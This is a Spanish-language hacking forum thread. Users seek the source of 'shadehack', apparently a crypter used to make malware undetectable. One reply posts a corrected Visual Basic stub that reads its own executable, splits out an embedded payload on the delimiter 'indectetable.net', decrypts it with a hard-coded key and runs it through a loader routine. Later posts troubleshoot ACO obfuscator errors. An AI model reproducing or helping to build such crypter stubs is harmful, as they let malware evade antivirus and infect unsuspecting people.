Hola alguien puede subir el source code de shadehack para practicar obfuscación? me refiero al code del video tutorial.
adjunto enlace con un source muy parecido o quizás el necesario. Este no deja compilar el cliente y el stub da error 9 despues de compilado.
[Enlace externo eliminado para invitados]
se agradece ayuda por favor.
saludos
Cambia el sub main del stub Por este:
Lo que tenia mal era el delimitador, Tenia Escrito "casa" en vez de "indectetable.net"
y eso es todo
Un saludo y suerte!
PD: el cliente compila de maravilla no tiene ningun error
Código: Seleccionar todo
Dim re As String, nbx() As String, v As String, vb() As Byte
Public Sub Main()
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
re = Space(LOF(1))
Get #1, , re
Close #1
Dim xo As New xd
nbx() = Split(re, "indectetable.net")
If nbx(2) = "SI" Then
MsgBox nbx(4), vbInformation, nbx(3)
End If
v = xo.DecryptString(nbx(1), "12345")
vb() = StrConv(v, vbFromUnicode)
Call Dinaurax(App.Path & "\" & App.EXEName & ".exe", vb(), Command)
End Sub
y eso es todo
Un saludo y suerte!
PD: el cliente compila de maravilla no tiene ningun error
perfecto gracias era problema de mi portatil lo de compilar.
tengo un problema y es que todas las pruebas que hago con ACO obfuscator me da error 424 object required y sigo el video tutorial al pie de la letra.
alguien me puede ayudar ?
podeis probar a obfuscar con aco con el método del videotuto para ver si os deja ?
saludos
tengo un problema y es que todas las pruebas que hago con ACO obfuscator me da error 424 object required y sigo el video tutorial al pie de la letra.
podeis probar a obfuscar con aco con el método del videotuto para ver si os deja ?
saludos
No se que ACO utilices pero si es el V0.4 suele suceder eso con las encriptaciones de codigo. prueba diferentes! por ejemplo a mi a veces me sucede si encripto con RC4 o con Base64 eso es cuestion de hacer pruebas amigo espero haberte ayudado.xra escribió:perfecto gracias era problema de mi portatil lo de compilar.
saludos
estoy con el 3.0 y ahora acabo de bajar el v0.4 .
estoy probandolo pero esto es diferente . al obfuscar no me aparece el texto verde con la svariables para modificar como aparece en el 3.0
algun video tutorial o tutorial de este aco v0.4
me puedes hacer un vidoe tuto ejemplo básico por favor ?
saludos
estoy probandolo pero esto es diferente . al obfuscar no me aparece el texto verde con la svariables para modificar como aparece en el 3.0
saludos
Date una vuelta por la seccion "Manuales y tutoriales" alli encontraras todo lo necesario.xra escribió:estoy con el 3.0 y ahora acabo de bajar el v0.4 .
saludos
algun enlace directo por favor?
estoy buscando pero no encuentro nada
saludos
estoy buscando pero no encuentro nada
saludos